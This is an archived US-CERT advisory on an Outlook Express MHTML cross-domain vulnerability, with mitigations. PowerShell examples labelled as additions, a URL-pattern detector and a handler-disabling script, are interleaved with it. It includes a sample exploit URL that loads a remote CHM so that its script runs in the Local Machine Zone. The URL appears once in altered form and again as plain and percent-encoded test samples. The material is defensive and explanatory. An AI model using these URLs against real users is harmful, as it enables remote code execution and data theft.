
Note: This document is part of the US-CERT website archive. These documents are no longer updated and may contain outdated information. Links may also no longer function. Please contact info@us-cert.gov if you have any questions about the US-CERT website archive.

TLP:WHITE

Alert (TA04-099A)

Cross-Domain Vulnerability in Outlook Express MHTML Protocol Handler

Original release date: April 08, 2004 | Last revised: April 26, 2004

Systems Affected

  • Microsoft Windows systems

Overview

A cross-domain vulnerability in the Outlook Express MIME Encapsulation of Aggregate HTML Documents (MHTML) protocol handler could allow an attacker to execute arbitrary code with the privileges of the user invoking the handler. The attacker may also be able to read and manipulate data on web sites in other domains or zones.

Description

There is a cross-domain vulnerability in the way the Outlook Express MHTML protocol handler (mhtml:) determines the security domain of data referenced by a URL that specifies an alternate location. When the MHTML handler references an inaccessible or non-existent file, the handler can access a file from an alternate location. The MHTML handler incorrectly treats the file from the alternate location as if it were in the same domain as the unavailable file.

The MHTML protocol handler is considered to be part of Outlook Express and is installed by default on all current Windows systems. The MHTML protocol handler is effectively a shared Windows component. Any program that exposes an MHTML protocol reference to the operating system will invoke the handler, typically using Internet Explorer (IE).

Programs that use the WebBrowser ActiveX control or the IE HTML rendering engine (MSHTML) may be affected by this vulnerability. Internet Explorer, Outlook, and Outlook Express are all examples of such programs.

US-CERT is tracking this issue as VU#323070. This reference number corresponds to CVE candidate CAN-2004-0380.

Impact

By convincing a victim to view an HTML document such as a web page or HTML email message, an attacker could access data or execute script in a different security domain than the one containing the attacker's document. By causing script to be run in the Local Machine Zone, the attacker could execute arbitrary code with the privileges of the user invoking the MHTML handler. The attacker may also be able to read or modify data in other web sites (including reading cookies or content and modifying or creating content).

Publicly available exploit code exists for this vulnerability. US-CERT has monitored incident reports that indicate that this vulnerability is being exploited. The Ibiza trojan, variants of W32/Bugbear, and BloodHound.Exploit.6 are some examples of malicious code that exploit this vulnerability. Any arbitrary payload could be delivered via this vulnerability, and different anti-virus vendors may identify malicious code with different names.

Most of the observed exploit code uses InfoTech Storage (ITS) protocol handlers and Compiled HTML Help (CHM) files to parse an HTML file in the Local Machine Zone. CHM files use the InfoTech Storage (ITS) format to store components such as HTML files, graphic files, and ActiveX objects, and Windows provides several protocol handlers that can access ITS files and individual CHM components: its:, ms-its:, ms-itss:, and mk:@MSITStore:.

When referencing an inaccessible or non-existent MHTML file using the ITS and mhtml: protocols, IE can access a CHM file from an alternate location. Because of the vulnerability in the MHTML handler, IE incorrectly treats the CHM file as if it were in the same domain as the unavailable MHTML file. Using a specially crafted URL, an attacker can cause arbitrary script in a CHM file to be executed in a different domain, violating the cross-domain security model.

Any programs, including other web browsers, that use the Windows protocol handlers (URL monikers) for ITS or MHTML protocols could function as attack vectors. Also, due to the way that IE determines MIME types, HTML and CHM files may not have the expected file name extensions (.htm/.html and .chm respectively).

A malicious web site or email message may contain HTML similar to the following:

ms-_its:_mhtml:_file://C:\nosuchfile.mht!_http://www.example.com//exploit._chm::exploit.html
(This URL is intentionally modified to avoid detection by anti-virus software.)
In this example, HTML and script in exploit.html will be executed in the security context of the Local Machine Zone. It is common practice for exploit.html to either contain or download an executable payload such as a backdoor, trojan horse, virus, bot, or other malicious code.

Note that it is possible to encode a URL in an attempt to bypass HTTP content inspection or anti-virus software.
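As an added example (not part of the advisory), the PowerShell function below flags URLs that combine the ITS handlers and mhtml: with an alternate location, after undoing the percent-encoding the advisory warns can evade content inspection. The sample URLs are constructed; host.invalid and the file names are placeholders.

```powershell
function Test-ItsMhtmlUrl {
    param([Parameter(Mandatory)][string]$Url)

    # Undo percent-encoding (repeated, to catch double encoding) and ignore case,
    # since the advisory notes encoding is used to evade content inspection.
    $decoded = $Url
    for ($round = 0; $round -lt 3; $round++) {
        $next = [System.Uri]::UnescapeDataString($decoded)
        if ($next -eq $decoded) { break }
        $decoded = $next
    }
    $decoded = $decoded.ToLowerInvariant()

    # Protocol handlers named in the advisory.
    $itsSchemes = @('its:', 'ms-its:', 'ms-itss:', 'mk:@msitstore:')
    $reasons = @()
    $hasIts = $false
    foreach ($scheme in $itsSchemes) {
        if ($decoded.Contains($scheme)) { $hasIts = $true; $reasons += "ITS handler $scheme" }
    }
    $hasMhtml = $decoded.Contains('mhtml:')
    if ($hasMhtml) { $reasons += 'mhtml: handler' }
    # "!" introduces the alternate location; "::" selects a component inside a CHM.
    $hasAlt = $decoded -match '![a-z]+://'
    if ($hasAlt) { $reasons += 'alternate location after !' }
    if ($decoded.Contains('::')) { $reasons += 'CHM component selector ::' }

    # Plain ITS/CHM references (e.g. local Help) are normal; the advisory's pattern
    # is mhtml: combined with an ITS handler or with an alternate location.
    [pscustomobject]@{
        Url        = $Url
        Suspicious = [bool]($hasMhtml -and ($hasIts -or $hasAlt))
        Reasons    = ($reasons -join '; ')
    }
}

# Constructed sample URLs (host.invalid is a placeholder): a benign page, a local Help
# reference, the advisory's pattern in plain form, and the same pattern percent-encoded.
$samples = @(
    'http://www.example.com/index.html',
    'mk:@MSITStore:C:\Windows\Help\sample.chm::/start.htm',
    'ms-its:mhtml:file://C:\missing.mht!http://host.invalid//bundle.chm::page.html',
    'ms-its%3Amhtml%3Afile%3A//C%3A%5Cmissing.mht%21http%3A//host.invalid//bundle.chm%3A%3Apage.html'
)
$samples | ForEach-Object { Test-ItsMhtmlUrl -Url $_ } | Format-Table -AutoSize
```

Only the last two samples are reported as suspicious; the local Help reference is listed with its reasons but not flagged, which keeps the check usable on proxy or mail gateway logs.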

Solution

Install a patch

Install the appropriate cumulative patch for Outlook Express according to Microsoft Security Bulletin MS04-013.

Disable ITS and MHTML protocol handlers

Disabling the ITS and MHTML protocol handlers appears to prevent exploitation of this vulnerability. Delete or rename the following registry keys:

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-itss,its,mk,mhtml}
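As an added example (not from the advisory), the PowerShell function below exports each of the handler keys listed above to a .reg file and then renames the key, and restores the original names when run with -Undo. It assumes an elevated session; the rename suffix and the backup directory are assumed values.

```powershell
function Set-ItsMhtmlHandlerState {
    param([switch]$Undo)

    $handlerRoot = 'HKLM:\SOFTWARE\Classes\PROTOCOLS\Handler'
    $handlers    = @('ms-its', 'ms-itss', 'its', 'mk', 'mhtml')   # keys named in the advisory
    $suffix      = '.disabled-TA04-099A'                           # assumed rename convention
    $backupDir   = Join-Path $env:ProgramData 'TA04-099A-backup'    # assumed backup location
    New-Item -ItemType Directory -Path $backupDir -Force | Out-Null

    foreach ($name in $handlers) {
        $key     = Join-Path $handlerRoot $name
        $renamed = Join-Path $handlerRoot ($name + $suffix)

        if ($Undo) {
            # Put the key back under its original name once patches are tested and installed.
            if (Test-Path $renamed) {
                Rename-Item -Path $renamed -NewName $name
                Write-Output "Restored handler key $name"
            }
            continue
        }
        if (-not (Test-Path $key)) {
            Write-Output "Handler key $name not present, skipping"
            continue
        }
        # Keep a .reg export too, so the key can be re-imported even if the renamed copy is lost.
        $regFile = Join-Path $backupDir "$name.reg"
        & reg.exe export "HKLM\SOFTWARE\Classes\PROTOCOLS\Handler\$name" $regFile /y | Out-Null
        Rename-Item -Path $key -NewName ($name + $suffix)
        Write-Output "Disabled handler key $name (exported to $regFile)"
    }
}

Set-ItsMhtmlHandlerState          # disable; run Set-ItsMhtmlHandlerState -Undo after patching
```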
Disabling these protocol handlers will significantly reduce the functionality of the Windows Help system and may have other unintended consequences. Plan to undo these changes after patches have been tested and installed.

Follow good Internet security practices

These recommended security practices will help to reduce exposure to attacks and mitigate the impact of cross-domain vulnerabilities. Additional recommendations can be found under Mitigating factors and Workarounds in the Vulnerability Details section of MS04-013.

  • Disable Active scripting and ActiveX controls

    NOTE: Disabling Active scripting and ActiveX controls will not prevent the exploitation of this vulnerability.

    Disabling Active scripting and ActiveX controls in the Internet and Local Machine Zones may stop certain types of attacks and will prevent exploitation of different cross-domain vulnerabilities. Disable Active scripting and ActiveX controls in any zones used to read HTML email.

    Disabling Active scripting and ActiveX controls in the Local Machine Zone will prevent malicious code that requires Active scripting and ActiveX controls from running. Changing these settings may reduce the functionality of scripts, applets, Windows components, or other applications. See Microsoft Knowledge Base Article 833633 for detailed information about security settings for the Local Machine Zone. Note that Service Pack 2 for Windows XP includes these changes.
  • Do not follow unsolicited links

    Do not click on unsolicited URLs received in email, instant messages, web forums, or Internet relay chat (IRC) channels.

  • Maintain updated anti-virus software

    Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against this vulnerability. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page.

Appendix A. Vendor Information

Microsoft Corporation

Please see Microsoft Security Bulletin MS04-013.

Appendix B. References

  • Vulnerability Note VU#323070 - http://www.kb.cert.org/vuls/id/323070
  • US-CERT Computer Virus Resources - http://www.us-cert.gov//reading_room/virus.html
  • CVE CAN-2004-0380 - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0380
  • Microsoft Security Bulletin MS04-013 - http://www.microsoft.com/technet/security/bulletin/ms04-013.mspx
  • Introduction to URL Security Zones - http://msdn.microsoft.com/workshop/security/szone/overview/overview.asp
  • About Cross-Frame Scripting and Security - http://msdn.microsoft.com/workshop/author/om/xframe_scripting_security.asp
  • MIME Type Determination in Internet Explorer - http://msdn.microsoft.com/workshop/networking/moniker/overview/appendix_a.asp
  • URL Monikers - http://msdn.microsoft.com/workshop/networking/moniker/monikers.asp
  • Asynchronous Pluggable Protocols - http://msdn.microsoft.com/workshop/networking/pluggable/pluggable.asp
  • Microsoft HTML Help 1.4 SDK - http://msdn.microsoft.com/library/en-us/htmlhelp/html/vsconHH1Start.asp
  • Microsoft Knowledge Base Article 182569 - http://support.microsoft.com/default.aspx?scid=182569
  • Microsoft Knowledge Base Article 174360 - http://support.microsoft.com/default.aspx?scid=174360
  • Microsoft Knowledge Base Article 833633 - http://support.microsoft.com/default.aspx?scid=833633
  • Windows XP Service Pack 2 Technical Preview - http://www.microsoft.com/technet/prodtechnol/winxppro/sp2preview.mspx
  • AusCERT Update AU-2004.007 - http://www.auscert.org.au/3990


This vulnerability was reported by Liu Die Yu. Thanks to http-equiv for additional research and collaboration.


Feedback can be directed to the author: Art Manion.


Revision History

  • April 8, 2004: Initial release
  • April 13, 2004: Added patch and vendor information (MS04-013), credited Liu Die Yu, updated vulnerability, impact, and workaround information about MHTML
  • April 23, 2004: Thanked http-equiv
  • April 26, 2004: Further modified sample exploit URL to minimize AV detection
